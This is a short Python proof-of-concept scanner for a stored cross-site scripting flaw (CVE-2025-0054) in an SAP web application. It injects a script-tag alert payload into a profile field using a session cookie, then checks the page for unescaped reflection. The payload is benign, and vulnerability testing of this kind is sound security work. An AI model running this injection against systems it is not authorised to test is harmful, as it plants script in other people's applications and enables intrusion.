import requests
from bs4 import BeautifulSoup

# CONFIG
TARGET_URL = "http://target-sap-url.com"
LOGIN_PATH = "/login"
VULN_ENDPOINT = "/user/profile"  # example vulnerable page
COOKIE = {"JSESSIONID": "your-session-id"}  # Add your session or login logic
XSS_PAYLOAD = "<script>alert('xss')</script>"

def submit_payload():
    data = {
        "username": "test",
        "bio": XSS_PAYLOAD  # Example field; adjust as needed
    }
    response = requests.post(TARGET_URL + VULN_ENDPOINT, data=data, cookies=COOKIE)
    if response.status_code == 200:
        print("[+] Payload submitted successfully.")
    else:
        print(f"[-] Submission failed. Status: {response.status_code}")

def check_reflection():
    response = requests.get(TARGET_URL + VULN_ENDPOINT, cookies=COOKIE)
    soup = BeautifulSoup(response.text, "html.parser")
    if XSS_PAYLOAD in response.text:
        print("[!] Possible stored XSS detected! Payload found in page source.")
    elif soup.find("script", text="alert('xss')"):
        print("[!] Script tag found — potential stored XSS.")
    else:
        print("[-] No stored XSS found.")

if __name__ == "__main__":
    print("== CVE-2025-0054 Stored XSS Scanner ==")
    submit_payload()
    check_reflection()